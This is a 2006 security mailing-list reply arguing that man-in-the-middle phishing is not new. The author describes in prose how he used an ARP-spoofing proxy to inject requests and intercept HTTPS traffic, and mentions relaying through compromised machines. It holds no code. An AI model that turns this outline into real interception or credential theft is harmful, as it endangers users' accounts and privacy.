Re: Mitm new?

[Rogan Dawes <discard () dawes za net>]

Jeff Robertson wrote:
> Why are man-in-the-middle phishing sites suddenly talked about as a
> "new" threat, as if there was rocket science involved?
>
> For instance
> http://blog.washingtonpost.com/securityfix/2006/07/citibank_phish_spoofs
> _2factor_1.html
>
> These things are basically proxies, which are as old as the web. Why
> does it surprise anyone to see these combined with phishing? (Then
> again, I still haven't figured out why phishing as we know it didn't
> "take off" circa 1994)
>
> Jeff Robertson

Yeah, there is nothing special about this.

At the time of the IE HTTPS Certificate attack 
(http://security.e-matters.de/advisories/012001.html), I used a 
transparent (arp-spoofing) MITM proxy to insert image requests for an 
SSL page from the target into non-SSL pages that passed through my 
proxy. After that, any subsequent requests for the targeted secure pages 
(even via bookmark, etc), passed through my proxy, and I could 
record/alter, etc any fields that I wanted to.

I guess one of the deterrents to using this technique is that the source 
of all the connections would appear to come from a single IP. Of course, 
it would not be too difficult to relay the connections via one or more 
zombie computers, exactly as they do currently to harvest credentials. 
This could introduce a lot of latency, which a user MIGHT notice.

Rogan

-------------------------------------------------------------------------
Sponsored by: Watchfire

Watchfire was recently named the worldwide market leader in Web 
application security assessment tools by both Gartner and IDC. 
Download a free trial of AppScan today and see why more customers choose 
AppScan then any other solution. Try it today!
 
https://www.watchfire.com/securearea/appscancamp.aspx?id=701500000008VnB
--------------------------------------------------------------------------